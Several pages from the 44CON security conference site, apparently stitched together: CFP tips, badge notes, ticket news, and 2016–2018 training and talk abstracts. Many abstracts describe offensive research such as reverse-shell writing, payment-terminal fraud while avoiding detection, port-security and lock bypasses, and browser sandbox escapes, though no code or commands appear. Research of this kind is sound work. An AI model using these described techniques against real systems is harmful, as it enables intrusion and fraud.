          This is an especially powerful tool for speakers coming from countries where English is a second language. All of our talks are delivered in English. We have some great speakers from across Europe, India and even China, and we want to keep the focus on the content, not on the way it’s conveyed.

          It can be pretty scary delivering a talk in a second or third language, and it’s useful to see you speak, both to reassure voters when you’re delivering a talk, and to determine what help we might be able to offer if your research is brilliant, but you struggle with the language.

          Even if you’re a native English speaker, throwing us a link to earlier talks lets us work out where and when we can put you. We often put more energetic speakers on in the afternoon for example.

          Submit your talks early in the process

          Most of the panel vote in several stages. Almost everyone votes on the first submissions coming in, and participation slowly drops off after a while. At several points while the CFP is open, more people will vote, but because there are fewer talks to vote on, we’ve noticed that early talks score higher on average than those submitted later.

          The more votes you get, the better the chance of bringing your voting average up and the better the chance of your talk being accepted. Submitting early gets you more (and often higher) voting scores.

          Remember It’s A Two-Way Street

          We completely understand how much of an effort you put in to come to speak at 44CON. Many of the crew talk at conferences themselves, and understand that you’re giving your time for free to go and speak at an event. That’s why we try to make the talk as cost neutral as possible for you to come and present. When people interact more with the event, and try to get involved, they’re generally more likely to have more positive responses.

          There are certain speakers who come back to 44CON regularly such as Jerry Gamblin, Saumil Shah and Joe Fitzpatrick amongst others, all of whom make really strong efforts to interact with the crew and those attending. If, in your submission, you come across like you’re treating 44CON as just another con to shop the same talk around and disappear, you’re probably going to score lower than someone who comes across as though they really want to be there.

          Coping with rejection

          Our scoring method is not without its faults. No scoring system is perfect, and we’ve had to break bad news to big names as well as people with talks some of us thought were brilliant fits for the event.

          If you don't hear from us straightaway, wait or contact us, don't assume your talk was rejected.
          If your talk was rejected, it’s not an indictment of you or your talk.

          To help you deal with the sting of rejection, remember this:

          1. Your talk not being accepted at 44CON does not mean we thought it was bad.
          2. You absolutely have the right to ask for feedback. It might take a while depending on when you ask, but Steve will personally write back to you with as much detail as he can provide.
          3. We’re all here to learn. If you think that we’ve made a mistake, or have ideas on how we can improve (beyond “accepting my awesome talk next time, dumbasses”), then we want to know.

          Most importantly, your talk not being accepted does not mean we don’t want you to come and enjoy 44CON. We absolutely do want you to come, and will happily offer you a discount on a ticket as a thank you for submitting.

          We want everyone to have a good time at 44CON. If you have any special needs or requests, from assistance with disabilities to being able to bring your kid(s) along just let us know. Unless it’s something we absolutely cannot accommodate, it will have no bearing on your submission’s consideration.

          Getting Started With Your HIDIOT Badge

          Warning: Unlike most software, hardware can permanently damage machines. While every effort has been made to ensure that the 44CON badge will not kill your computer, remember that you built it yourself. Consider using a USB Hub when connecting the HIDIOT. Electrical faults are more likely to kill the hub than your computer. 44CON and Sense/Net Ltd accept no responsibility, both in general and specifically to the use and abuse of your HIDIOT and any damage caused therein.

          Thanks to Akos Rajtmar for the HIDIOT assembly video above

          If you came to 44CON 2016, then congratulations, you are one of about 500 people who have a HIDIOT 0.7 board.

          If you took part in the badge soldering workshop, then congratulations, you are one of <150 people who have a fully functioning HIDIOT 0.7 board.

          But what is a HIDIOT 0.7? And how do you make it do something other than blink?

          Jacob Torrey: Bootstrapping an Architectural Research Platform

          Over the next few weeks we’re going to announce the 44CON talks and workshops. Don’t forget to get your tickets!

          Our next announcement is Jacob Torrey – Bootstrapping an Architectural Research Platform

          This talk aims to provide the fundamental architectural knowledge and resources for a security researcher interested in misuse of the x86 platform to conduct their own research with less “boiler-plate”. Covering the privileges and architectural events that different CPU rings can monitor, a few basic research hypervisors, and new technologies coming into the mainstream; this talk will aid researchers to rapidly focus on the research questions and not the setup.

          Jacob Torrey is an Advising Research Engineer at Assured Information Security, Inc. where he leads the Computer Architectures group and acts as the site lead for the Colorado branch. Jacob has worked extensively with low-level x86 and MCU architectures, having written a BIOS, OS, hypervisor and SMM handler. His major interest is how to (mis)use an existing architecture to implement a capability currently beyond the limitations of the architecture. In addition to his research, Jacob volunteers his time organizing conferences in Denver (RMISC & BSidesDenver) and regular meet-ups across the front range.

          You can follow Jacob on Twitter @JacobTorrey

          Details of all of our talks, workshops and speakers are being announced daily. Don’t forget to book your tickets before they’re sold out!

          Saumil Shah: ARM Shellcode Basics

          Over the next few weeks we’re going to announce the 44CON talks and workshops. Don’t forget to get your tickets!

          Our third announcement is Saumil Shah’s workshop: ARM Shellcode Basics

          This is a 2 hour workshop on writing ARM Shellcode from scratch. I will cover some simple ARM assembly, and then we will work on two shellcode examples. A simple execve() shell and a fully working Reverse Shell. We will then test this with two ARM exploits. Attendees are required to bring in their laptops with a working copy of VMWare (Player/Workstation/Fusion). ARM images running on QEMU will be distributed to the participants.

          Saumil Shah is the founder and CEO of Net-Square, providing cutting edge information security services to clients worldwide. Saumil is an internationally recognized conference speaker and instructor for over 15 years. He is also the co-developer of the wildly successful “Exploit Laboratory” courses and has authored two books titled “Web Hacking: Attacks and Defense” and “The Anti-Virus Book”.

          Saumil holds an M.S. in Computer Science from Purdue University, USA and a B.E. in Computer Engineering from Gujarat University. He spends his leisure time playing Pacman, flying kites, travelling around the world and taking pictures.

          You can follow him on twitter @therealsaumil

          Details of all of our talks, workshops and speakers are being announced daily. Don’t forget to book your tickets before they’re sold out!

          Keynote Talk: Robert Schifreen – Three Decades In Security. What’s Changed, And What Hasn’t.

          Over the next few weeks we’re going to announce the 44CON talks and workshops. Don’t forget to get your tickets!

          Our first announcement is for Robert Schifreen’s upcoming keynote – Three Decades In Security. What’s Changed, And What Hasn’t.

          Cybercrime has changed greatly in the last 30 years.  People still hack, but for many different reasons.  The rewards available to hackers are much greater, as are the risks.  But many of the techniques that hackers employ, both technical and psychological, have not changed at all.  Victims still fall for the social engineering tricks and the fake emails.  They still write down passwords.  Compilers still fail to protect programmers from buffer overruns. Programmers still fail to protect themselves from being vulnerable to database injection attacks.

          Have we learned anything in 32 years?  If so, how much, and is it enough?

          In case you were wondering, yes this is that Robert Schifreen. 30 years after the trial that paved the way for the Computer Misuse Act, he has a lot to tell us, and we’re really looking forward to hearing about it.

          Robert Schifreen is the founder of SecuritySmart.co.uk, which provides measurable IT security awareness training. He first became known in the security industry in 1985 when he was the first person in the world to be arrested and tried by a jury in connection with computer hacking. His ultimate acquittal in 1987 on all charges, by the House of Lords (the most supreme court at the time), led to the introduction of the Computer Misuse Act 1990.

          Details of all of our talks, workshops and speakers are being announced daily. Don’t forget to book your tickets before they’re sold out!

          #####EOF##### 44CON

          Building a cloud security training platform – Pt 2: Infrastructure As Code

          This is a guest post by one of our trainers, Paul Schwarzenberger. Paul is running the fantastic Cloud Security and DevSecOps training course this June. He also has a blog where he talks about AWS, Cloud Security and DevSecOps. This is part of a series on how he’s built a platform to make things easier for those attending his training. Part 1 is available here. Thanks, Paul!

          More 2018 44CON Videos Added

          This week we’ve added another 5 videos from 44CON 2018. We’re also starting to move our older conf talk videos over to the YouTube channel, so if you’d like them to show up in your stream, don’t forget to subscribe to the 44CONtv channel and click the bell to get notifications as new videos go up. From now on, all of our videos will be up on YouTube as soon as the 1s and 0s can carry them.

          First Videos From 44CON 2018 Up

          For a long time we used to sell access to videos on Vimeo. Recently we moved back to making videos freely available on YouTube. Due to some last minute issues with 2018 we had to do a bit more work to get the 2018 videos to a point we were happy with. However, in 2019 the wonderful Ministraitor will be supporting our videos, and we’ll be able to provide them for free from now on. The first 5 videos from 2018’s 44CON are now ready to go, so read on for the vids and our thoughts.

          Building an AWS and Azure security training platform

          This is a guest post by one of our trainers, Paul Schwarzenberger. Paul is running the fantastic Cloud Security and Devops training course this June. He also has a blog where he talks about AWS, Cloud Security and DevOps. This is part of a series on how he’s built a platform to make things easier for those attending his training. Thanks, Paul!

          Part 1 – Proof of Concept

          The Cloud Security and DevSecOps training course I’m delivering for 44CON in June includes AWS, Azure and GitHub accounts which the students use so they don’t need to create their own.

          Wouldn’t it be great if students could turn up with any laptop, or even an iPad, and do the course. And the time spent on the labs would be used to learn about cloud security and DevSecOps, not debugging software installation issues.


          Hacking 44CON’s Pricing Model (5 Different Ways)

          It seems like it was only two weeks ago when we announced the early bird tickets, but sadly all 50 have been snapped up. Still, being the great folks we are, we wanted to show you 5 different ways to hack the 44CON ticket pricing model because, well, basically we’re good guys like that. After all, we taught you how to game the 44CON CFP and that worked well. In the words of every security researcher everywhere, “What could possibly go wrong?”

          44CON 2019 Early-Bird Tickets are now on sale

          Our 2019 Early bird tickets are now on sale. There are 50 early bird tickets available until March 11th. Once they’re gone, they’re gone. As usual, the early-bird prices still start at £299 inc. VAT, but there are also accommodation and t-shirt options available.

          We’re trialling a small selection of cheap expo tickets providing limited event access with certain groups, and there will be pre-registered free evening event tickets. Early bird tickets are the cheapest fully catered, full access tickets you can get. If you want to see the talks, you want one of these.

          As well as full access to 44CON, Early bird ticket holders can also ask for an invite to our 44CONnect event in London on the 13th of March. This invite-only event will take place the day before CRESTCon, and will feature talks from some of the trainers taking part in our quarterly training programme. Please make sure you mention 44CONnect on your booking, or contact us after booking if you’d like to come.

          Book your tickets in our shop. If you’d like to book in bulk or through your employer, contact us to arrange an invoice.

          44CONnect – A 1-day invite-only event in March 2019

          44CONnect is a 1-day invite-only event taking place on the 13th of March, somewhere in London. The purpose of the day is to bring together people doing 44CON training, so they can connect with trainers and people on different courses. It’s our way of giving people who’ve attended our courses the chance to get a taste of upcoming training, and the opportunity to get some extra credit to take back to the office.

          To qualify for an invite, you need to have done one of the following:

          There are 20 tickets available, so make sure you qualify!

          Our trainers from the last two days of training will deliver talks, as well as some of those delivering courses later this year. All of our training course delegates are invited, for whom lunch will be included. Early bird ticket holders invited to the event will have to buy their own lunch, as we can’t book it for them in advance.

          There’ll be a special round of lightning talks for training delegates to deliver a short talk about something they learned on their course. Those speaking will get a small certificate of thanks that they can take back to the office.

          Drinks have been organised for the evening, but we need to be in bed early for CRESTCon the next day.

          *Early-bird ticket holders will be chosen at random throughout February, although unsubstantiated rumours abound that asking for an invite on your ticket order may drastically improve your chances…

          #####EOF##### 44CON 2016 Training – 44CON

          44CON 2016 Training

          All training courses are run between the 12th and 14th September 2016 at 2 etc venues.

          Presented by: Joe FitzPatrick

          This course introduces and explores attacks on several different relatively accessible interfaces on embedded systems. Attendees will get hands-on experience implementing and deploying a number of low-cost hardware devices to enable access, privilege, and deception which is in some cases imperceptible from software. We’ll examine UART, JTAG and SPI interfaces on both ARM and MIPS embedded devices, representative of a wide range of embedded devices that span consumer electronics, medical devices, industrial control hardware, and mobile devices. We will observe, interact with, and exploit each interface to use physical access to enable software privilege.

          Course Length: 2 days (13th-14th September 2016) at etc.venues Marble Arch

          Presented by: Saumil Shah

          This year, we bring you a brand new class. The ARM Exploit Laboratory debuts in 2016, bringing you an intense 3 day course featuring a practical hands-on approach to exploit development on ARM based systems.

          Course Length: 3 days (12th-14th September 2016) at etc.venues The Hatton

          Presented by: Dawid Czagan

          This course has been cancelled.

          Have you ever thought of hacking web applications for fun and profit? How about playing with authentic, award-winning security bugs identified in some of the greatest companies? If that sounds interesting, join this unique hands-on training! Dawid Czagan will discuss security bugs that he has found together with Michal Bentkowski in a number of bug bounty programs (including Google, Yahoo, Mozilla, Twitter and others). You will learn how bug hunters think and how to hunt for security bugs effectively. To be successful in bug hunting, you need to go beyond automated scanners. If you are not afraid of going into detail and doing manual/semi-automated analysis, then this hands-on training is for you.

          Course Length: 2 days (13th-14th September 2016) at etc.venues Marble Arch

          Presented by: Dominic Chell, MDSec

          The course follows chapters 1-9 of the Mobile Application Hacker’s Handbook, with a strong focus on practical attacks. Over the 2-day training course delivered by the lead author of the book, delegates will learn the tricks and techniques to hack and secure mobile applications on the iOS and Android platforms.

          Course Length: 2 days (13th-14th September 2016) at etc.venues Marble Arch

          Presented by: Jordan Wiens, Peter LaFosse & Rusty Wagner

          This course has been cancelled.

          PwnAdventure is a custom 3D MMORPG created for the Ghost in the Shellcode CTF and it’s now been transformed into a hands-on reverse engineering training class. Learn the basics of binary reverse engineering, custom network protocol analysis, all while granting yourself in-game superpowers and pwning newbs with your FPS skills.

          Course Length: 2 days (13th-14th September 2016) at etc.venues Marble Arch

          Presented by: Marcus Pinto, MDSec

          The Web Application Hacker’s Handbook (WAHH) Series is the most deep and comprehensive general purpose guide to hacking web applications that is currently available. This course is a practical opportunity to take the skills and theory taught in the book to the next level, experimenting with all of the tools and techniques against numerous vulnerable web applications and labs, under the guidance of the book’s authors. The course also includes new material from the second edition of WAHH, bringing the course right up to date with the latest attacks.

          Course Length: 2 days (13th-14th September 2016) at etc.venues Marble Arch

          Presented by: Ashfaq Ansari

          This course has been cancelled.

          This training is focused on exploitation of different Windows Kernel Mode vulnerabilities ranging from Pool Overflow to Use after Free. We will cover basics of Windows Kernel Internals and hands-on fuzzing of Windows Kernel Mode drivers. We will dive deep into exploit development of various kernel mode vulnerabilities. We will also look into different vulnerabilities in terms of code and the mitigations applied to fix the respective vulnerabilities.

          Course Length: 3 days (12th-14th September 2016) at etc.venues The Hatton

          Book your 44CON 2016 training course now!

          #####EOF##### 44CON 2018 Talks – 44CON

          44CON 2018 Talks

          For a full list of 44CON 2018’s confirmed speakers, please click here.

          They’re All Scorpions – Successful SecOps in a Hostile Workplace

          Presented by: Pete Herzog

          Your job is to secure operations. But nobody listens to you. There’s no budget. Management keeps making bad security decisions that seem to sabotage your efforts. Do you flee or do you try harder? The security books, blogs, and tweeting pundits out there tell us we need to learn the language of business. We need to put risk in terms of money that management understands. We need to be like the management we’re trying to protect. And that’s where it all falls apart. The security to business relationship is often textbook abusive codependency. You do well and nobody notices. You fail and you get fired or worse- shamed by your peers over social media for whatever the company releases as the statement for the breach. So how do you do SecOps under those conditions? This talk will focus on new ways to approach SecOps to face the challenges you have today with business demands. We will look at new security research that will make a difference for how you do your job. Most of all we will show you technical security practices to help you sustain your new found stance.

          The UK’s Code of Practice for Security in Consumer IoT Products and Services

          Presented by: David Rogers

          In March 2018, the UK launched its Secure by Design report in order to help defend against security threats, especially for consumer Internet of Things products and services. Over the past few years, poorly secured IoT devices have been hijacked in both targeted as well as large-scale DDoS attacks such as Mirai. In addition to this, poor security can threaten both privacy and safety.

          The speaker, David Rogers authored the UK’s ‘Code of Practice for Security in Consumer IoT Products and Associated Services’, in collaboration with DCMS, NCSC, ICO and industry colleagues with extensive support from the security research community. David will discuss the guidelines within the Code of Practice, why these were prioritised and why the top three became dealing with the password problem, implementing vulnerability disclosure and acting on it and addressing software updates. David will also look at what’s next: what will the challenges be and will the Code of Practice succeed in its aims? How can IoT products possibly be certified and how will the threat landscape change in response to improving security?

          Weak analogies make poor realities – are we sitting on a Security Debt Crisis?

          Presented by: Charl van der Walt

          Cyber Security is often framed in terms of ‘Risk’- the possibility of suffering harm or loss – and the ‘Management’ of Risk to reduce uncertainty. This is familiar territory for businesses. Cyber Security falls in neatly under Risk Management, is assigned a suitable place on the organigramme, tossed some spare budget and granted a few paragraphs in the board report. NIST defines Risk as a ‘function of the likelihood of a given threat-source’s exercising a particular potential vulnerability, and the resulting impact of that adverse event on the organisation’.

          Key theme:
          This presentation explores the idea that making cyber security analogous to risk is holding us back. How about we talk about security ‘debt’ instead? Technical Debt is already a well understood concept in software development – the cost of additional rework caused by choosing an easy solution now instead of using a better approach that would take longer or cost more. Changing our language changes how we think and how we behave. This presentation argues that such a change could have a significant impact on software security.

          In this presentation we will comment on the power of ‘analogies’ and how they’ve shaped our industry. We’ll then consider the difference between the ‘security as risk’ and the ‘security as debt’ paradigms and explore how changing paradigms may change the way we think about, talk about and measure software security. We believe this could have a very empowering effect on development managers and other security professionals who are struggling to articulate the relative benefits of security (or a lack of security) to a software product.

          Catch Me If You Can: Ephemeral Vulnerabilities in Bug Bounties

          Presented by: Shubham Shah and Michael Gianarakis

          The internet is changing, at a much faster pace today with cloud computing being so easily accessible. As the attack surface of the internet (IPv4) changes there are periods of time where vulnerabilities are present but dissipate quickly.

          By being able to monitor an organisation and effectively determine these changes, we’ve found a number of critical vulnerabilities within networks and applications that are only present for a short period of time. This presentation will detail multiple critical vulnerabilities found by participating in bug bounty programs that we classify as ephemeral vulnerabilities, and the details on how we identified and exploited them in the first place.

          For the Love of Money: Finding and exploiting vulnerabilities in mobile point of sales systems

          Presented by: Leigh-Anne Galloway and Tim Yunusov

          These days it’s hard to find a business that doesn’t accept faster payments. Mobile Point of Sales (mPOS) terminals have propelled this growth lowering the barriers for small and micro-sized businesses to accept non-cash payments. Older payment technologies like mag-stripe still account for the largest majority of all in-person transactions. This is complicated further by the introduction of new payment standards such as NFC. As with each new iteration in payment technology, inevitably weaknesses are introduced into this increasingly complex payment eco-system.

          In this talk, we ask, what are the security and fraud implications of removing the economic barriers to accepting card payments; and what are the risks associated with continued reliance on old card standards like mag-stripe? In the past, testing for payment attack vectors has been limited to the scope of individual projects and to those that have permanent access to POS and payment infrastructure. Not anymore!
          In what we believe to be the most comprehensive research conducted in this area, we consider four of the major mPOS providers spread across the US and Europe: Square, SumUp, iZettle and Paypal. We provide live demonstrations of new vulnerabilities that allow you to MitM transactions, send arbitrary code via Bluetooth and mobile application, modify payment values for mag-stripe transactions, and a vulnerability in firmware; DoS to RCE. Using this sampled geographic approach, we are able to show the current attack surface of mPOS and to predict how this will evolve over the coming years.

          New to this talk, we will demonstrate how anyone can carry out an attack to send arbitrary code to an mPOS device using simple hardware costing less than £8. The automation of this process allows an attacker to select from a variety of pre-generated messages to send to the mPOS during the transaction process. With this an attacker can tamper with the process to give the appearance that a transaction has been completed when it has not been authorized. Or, a fraudulent merchant could manipulate the process to force a victim to approve multiple transactions.

          Finally, for audience members that are interested in integrating testing practices into their organisation or research practices, we will show you how to use mPOS to identify weaknesses in payment technologies, and how to remain undetected in spite of anti-fraud and security mechanisms.

          Ghost in the Locks – owning electronic locks without leaving a trace

          Presented by: Tomi Tuominen and Timo Hirvonen

          A little over ten years ago, a friend of ours returned to his hotel room to find that his laptop was gone. The door to his room showed no signs of forced entry; there was no record that the electronic lock had been accessed while he was away; and there was certainly no evidence that this electronic lock, deployed on millions of doors in more than 150 countries worldwide, could have been hacked.

          Sometimes hacking boils down to spending more time on something than anyone could reasonably expect. This talk is an ode to that cliché. It is the culmination of a decade-long quest to find out whether the most widely used electronic lock in the world can be bypassed without leaving a trace. And in this adventure, breaking into hotel rooms is only the beginning. But lucky for all of us, unlike most cases of theft from hotel rooms, this story has a happy ending.

          Pwning the 44CON Nerf gun

          Presented by: Chris Wade and Dave Lodge

          Con speakers fear the Nerf gun. Overrun your talk time at your peril; Steve will shoot your arse with extreme prejudice until you STFU. We had to find a way to pwn the gun and shoot him back.

          That’s when we found the Nerf Terrascout: a remote tank gun controlled over 2.4GHz, with a video feed to the remote, complete with crosshairs.

          At first, we thought this would be a trivial job: figure out the RF and take control. It turned into a mammoth hardware, firmware and RF reversing project.

          This puppy is so over-specced it would drive you to tears.

          The talk will cover the fails, hair loss and eventual success. There won’t be any smart dildos in it, though some of the techniques used are equally suited to teledildonics exploitation, if that’s your thing.

          Reversing RF in a high frequency environment using SDRs is challenging. We’ll discuss how we worked around these issues using hardware reversing skills.

          We had to import hardware from China for this project, which we could then programme ourselves using SPI, impersonate the legitimate controller and ‘jack the tank gun.

          This talk will of course include a live demonstration of hijacking the tank gun and (possibly) shooting Steve.

          JARVIS never saw it coming: Hacking machine learning (ML) in speech, text and face recognition – and frankly, everywhere else

          Presented by: Guy Barnhart-Magen and Ezra Caltum

          Exploits, Backdoors, and Hacks: words we do not commonly hear when speaking of Machine Learning (ML). In this talk, I will present the relatively new field of hacking and manipulating machine learning systems and the potential these techniques pose for active offensive research.
          The study of Adversarial ML allows us to leverage the techniques used by these algorithms to find weak points and exploit them in order to achieve:

          • Unexpected consequences (why did it decide this rifle is a banana?)
          • Data leakage (how did they know Joe has diabetes)
          • Memory corruption and other exploitation techniques (boom! RCE)
          • Influence the output

          In other words, while ML is great at identifying and classifying patterns, an attacker can take advantage of this and take control of the system.
          This talk is an extension of research made by many people, including presenters at DefCon, CCC, and others – a live demo will be shown on stage!

          Garbage In, RCE Out 🙂

          Kill All Humans… Bugs! : Machine Learning to the rescue of code review

          Presented by: Philippe Arteau

          Security code reviews with static analysis tools have inherent problems. While many potential vulnerabilities are found quickly, the number of false positives can be overwhelmingly high on large applications (think millions of lines of code). Even with just a few dozen findings, the human fatigue can have a big impact on the triage. Our research addresses these issues by applying machine learning (ML) to automatically triage the output of static analysis tools.

          The objective is to classify vulnerabilities, such as SQL injection or Cross-Site Scripting, using supervised machine learning algorithms. Supervised learning implies that a subset of issues has been classified as false positives or real vulnerabilities. Since algorithms need more than just basic attributes to be efficient, datasets are enriched with various indicators that humans look at when reviewing code. Attributes fall in four categories: location (class names, packages, module), data flow sources (method calls, variables’ flow), API (sink, source) and dynamic expression. This talk uncovers the level of effectiveness of these various attributes with common algorithms (random forest, naive Bayes and tree) and releases “Find Security Bugs ML”, a set of open-source tools that build enriched datasets and classify findings using ML algorithms.

          Additionally, demonstrations will be made to cover the tools’ main functionalities. These include large-scale vulnerability scanning while prioritizing issues presented to reviewers and double checking classification made by developers.

          Applying the tool on Java libraries, including the Spring Framework, allowed us to find some interesting 0-day vulnerabilities. Attendees should be able to replicate similar findings on their enterprise applications or third party’s libraries, even when they don’t have the application’s source code due to Java’s bytecode support.

          So You Want to Red Team?

          Presented by: Lawrence Munro and Matt Lorentzen

          So, you want to be a Red Teamer, but you can’t get into it because you’re not a big enough name, or you lack the opportunities and experience to develop the skill-set? It’s extremely hard to develop your red teaming skills without access to legitimate work within this sphere (or legal, at least!). The skills are advanced and require hours spent in enterprise environments honing your tradecraft, but access to this world can be a chicken and the egg situation.

          In this talk, we discuss the skill differences between pen testing and red teaming and how to break into a red team. We approach the topic from both a career / tactical angle as well as how to close the upskilling gap. We introduce a new open source lab (Fortis), which provides a new approach to simulating user interactions (using unique ‘Digital People’) to help you develop the right skillsets without going out-of-scope and staying on the right side of the law.

          Automating myself out of a job – A pentesters guide to left shifting security testing

          Presented by: Jahmel Harris

          Security is big business. Between security companies trying to sell “security-in-a-box” and infosec professionals charging a fortune to tell devs “you’re doing it wrong”, is it any wonder security is an area that is often deprioritised?

          In this talk, we’ll look at what we should be doing to left shift security testing i.e. make it easier to perform security tests during development. By working harder to integrate ourselves into the development process, we can start to see what can and should be automated (and where a security specialist should actually fit in). We’ll look to understand that writing secure applications does not need to be costly and not all applications need to have the same level of security.

          By using actual vulnerabilities found during pen tests as examples, we will look at the tools and techniques we can use to detect vulnerabilities automatically and early in the development lifecycle, ultimately allowing us to release software often and quickly while still having a good understanding of the application’s risk.

          The aim of this talk will be to understand why security has not kept current with modern development practices and give developers the ability to integrate security into the development pipeline.

          Using SmartNICs to Provide Better Data Center Security

          Presented by: Jack Matheson, assisted by Ahmad Atamlh

          Data Center security has been forced to reinvent itself as software complexity increases, networking capabilities grow more agile, and attack complexity turns unmanageable. With this change, the need for security policy enforcement to be handled at the edge has pushed functionality onto host compute systems, resulting in inherent performance loss and security weakness due to consolidation of resources.

          In the first part of the talk we will be presenting a SmartNIC-based model for data-center security that solves both the performance problem and the security problems of edge-centric policy models. The model features a more robust isolation of responsibilities, superior offload capabilities, significantly better scaling of policy, and unique visibility opportunities.

          To illustrate this, we present a SmartNIC-based reference architecture for network layout, as well as examples of SmartNIC security controls and their resulting threat models.

          The second part of the talk will unveil a new innovative technique for tamper proof host introspection as SmartNICs are in a unique position to analyze and inspect the memory of the host to which they are attached. Normally, this functionality is reserved for a hypervisor, where it is known as ‘guest introspection’ or ‘virtual-machine introspection’. With host introspection, security controls no longer live in the hypervisor, but on the SmartNIC itself, on a separate trust domain. In this way, the visibility normally achieved with guest introspection can be performed for the entire host memory in an isolated and secure area. In order for host introspection to work in the same way as guest introspection, memory is DMA transferred in bursts over the PCI-e bus that attaches the SmartNIC to the host. As this method can be subverted to hide unwanted software, we will demonstrate a novel approach to tamper proof the acquisition of memory and for performing live introspection.

          Host introspection complements the network controls implemented using the SmartNIC by enabling the measurement of the integrity and the behavior of workloads (virtual machines, containers, bare metal servers) to identify possible indicators of compromise. The visibility and context gained also enhances the granularity of network controls, resulting in measurably better security for the data center compared to traditional software-only based controls.

          A live demo will showcase this capability.

          Bypassing Port-Security In 2018 – Defeating MacSEC and 802.1x-2010

          Presented by: Gabriel Ryan

          Existing techniques for bypassing wired port security are limited to attacking 802.1x-2004, which does not provide encryption or the ability to perform authentication on a packet-by-packet basis [1][2][3][4]. The development of 802.1x-2010 mitigates these issues by using MacSEC to provide Layer 2 encryption and packet integrity check to the protocol [5]. Since MacSEC encrypts data on a hop-by-hop basis, it successfully protects against the bridge-based attacks pioneered by the likes of Steve Riley, Abb, and Alva Duckwall [5][6].

          In addition to the development of 802.1x-2010, improved 802.1x support by peripheral devices such as printers also poses a challenge to attackers. Gone are the days in which bypassing 802.1x was as simple as finding a printer and spoofing its address, as hardware manufacturers have gotten smarter.

          In this talk, we will introduce a novel technique for bypassing 802.1x-2010 by demonstrating how MacSEC fails when weak forms of EAP are used. Additionally, we will discuss how improved 802.1x support by peripheral devices does not necessarily translate to improved port-security due to the widespread use of weak EAP. Finally, we will consider how improvements to the Linux kernel have made bridge-based techniques easier to implement and demonstrate an alternative to using packet injection for network interaction. We have packaged each of these techniques and improvements into an open source tool called Silent Bridge, which we plan on releasing at the conference.

          References:

          1. https://blogs.technet.microsoft.com/steriley/2005/08/11/august-article-802-1x-on-wired-networks-considered-harmful/
          2. https://www.defcon.org/images/defcon-19/dc-19-presentations/Duckwall/DEFCON-19-Duckwall-Bridge-Too-Far.pdf
          3. https://www.gremwell.com/marvin-mitm-tapping-dot1x-links
          4. https://hackinparis.com/data/slides/2017/2017_Legrand_Valerian_802.1x_Network_Access_Control_and_Bypass_Techniques.pdf
          5. https://www.cisco.com/c/en/us/products/collateral/ios-nx-os-software/identity-based-networking-services/deploy_guide_c17-663760.html
          6. https://1.ieee802.org/security/802-1ae/

          Make ARM Shellcode Great Again

          Presented by: Saumil Shah

          Compared to x86, ARM shellcode has made little progress. The x86 hardware is largely homogenous. ARM, however, has several versions and variants across devices today. There are several constraints and subtleties involved in writing production quality ARM shellcode which works on modern ARM hardware, not just on QEMU emulators.

          In this talk, we shall explore issues such as overcoming cache coherency, reliable polymorphic shellcode, ARM egghunting and last but not the least, polyglot ARM shellcode. A bonus side effect of this talk will be creating headaches for those who like to defend against attacks using age old signature based techniques. There will be demonstrations of my shellcode on ARM IoT devices featuring different types of ARM architecture. A detailed article shall also be submitted to PoC||GTFO closer to the time of the conference.

          Exploits with Scratch

          Presented by: Kevin Sheldrake

          Scratch is a programming language and IDE targeted at teaching young children how to code. The environment is sprite-based with all code residing behind each of the sprites and the stage (background). It is particularly good at developing games not unlike the flash-based games of the 90s/00s. Typically, the Scratch environment is a sandbox limiting all actions to objects within its own world. With the offline version of Scratch v2, however, it is possible to load ‘experimental HTTP extensions’ that can introduce new blocks linked to python functions via a web service API.

          Using the experimental extensions, I have implemented a set of blocks that allow access to TCP/IP functions. With these blocks it is possible to fuzz and exploit vulnerable services on a network-accessible victim machine. As a demonstration I have developed a PoC for the web server running on Saumil Shah’s tinysploit (stack smash) plus PoCs for two echo servers I have added to it (stack smash and format string vulnerability).

          The aims of the talk are to show that the (supposedly) sandboxed Scratch can be used to send evil packets to the network, and also to show that fuzzing and building exploits doesn’t have to involve coding abilities beyond those required to develop in Scratch. In other words, if you (or your child) wishes to learn how to write your own exploits, then this is all possible with Scratch and my experimental extension.

          The talk will cover the intricacies of the Scratch extension API and the limitations that need to be overcome to make it usable, plus how these simple concepts can be strung together to create exploits.

          Subverting Direct X Kernel For Gaining Remote System

          Presented by: Rancho Han and Chen Nan

          Since Edge introduced the win32k filter mechanism, the way of escaping the sandbox from kernel is getting narrower and narrower. In fact, on the latest win10 rs4, most types of GDI objects could not be created in the content process of Edge. In addition, the type isolation makes it very difficult to exploit a win32k bug. This is a huge challenge for breaking Edge sandbox now. However, Edge allows us to access the Direct X kernel from the unfiltered syscall functions.

          Last year, Tencent ZhanluLab began to study the Direct X subsystem, and we discovered 10+ bugs in a few months. In the first part of this talk, we start with an overview of the Direct X subsystem and discuss how to analyze its interfaces and internal objects. After that, we explain three bugs representing three typical security flaws. Among the vulnerabilities we discovered, a few of them are very interesting, and it is a bit special to exploit them. We successfully leverage a vulnerability to break the Edge and escalate privilege to system. We will disclose all the details of this exploit in the second part of this talk.

          Insight into fuzzing and pwning of Adobe Flash

          Presented by: Jie Zeng

          In recent years, more hacker attacks (Advanced Persistent Threat) for Adobe Flash Player have taken place in the wild. Therefore, Adobe Flash manufacturers have higher security requirements. Various mitigations were added. At the same time more security researchers are also beginning to study the security issues of Adobe Flash, so more and more security vulnerabilities have been discovered.

          This talk will discuss how I found vulnerabilities, and the main Flash attack surface I discovered.

          And then I will carefully explain a few of the representative vulnerabilities that I have discovered, analyse the root cause of the vulnerability, and how the patches are patched.

          Finally, when we have found a vulnerability that we want to write an exploit for, we will encounter many mitigations. So I will talk about the major mitigations that Flash has added, including memory protect, isolators of heaps, CFG and Memory management of Flash.
          So in order to bypass these mitigations the exploit becomes more and more complicated, and I will share a method of memory layout that is still feasible to bypass the isolators of heaps.

          How to Explain Post-Quantum Cryptography to a Middle School Student

          Presented by: Klaus Schmeh

          One of the hottest topics in current crypto research is Post-Quantum Cryptography. This branch of cryptography addresses asymmetric crypto systems that are not prone to quantum computers.

          Virtually all asymmetric crypto systems currently in use (Diffie-Hellman, RSA, DSA, and Elliptic Curve Crypto Systems) are not Post-Quantum. They will be useless once advanced quantum computers are available. Quantum computer technology has made considerable progress in recent years, with major organisations, like Google, NSA, and NASA, investing in it.

          Post-Quantum Cryptography uses advanced mathematical concepts. Even if one knows the basics of current asymmetric cryptography (integer factorisation, discrete logarithms, …), Post-Quantum algorithms are hard to understand.

          The goal of this presentation is to explain Post-Quantum Cryptography in a way that is comprehensible for non-mathematicians. Five families of crypto systems (as good as all known Post-Quantum algorithms belong to these) will be introduced:

          Lattice-based systems:

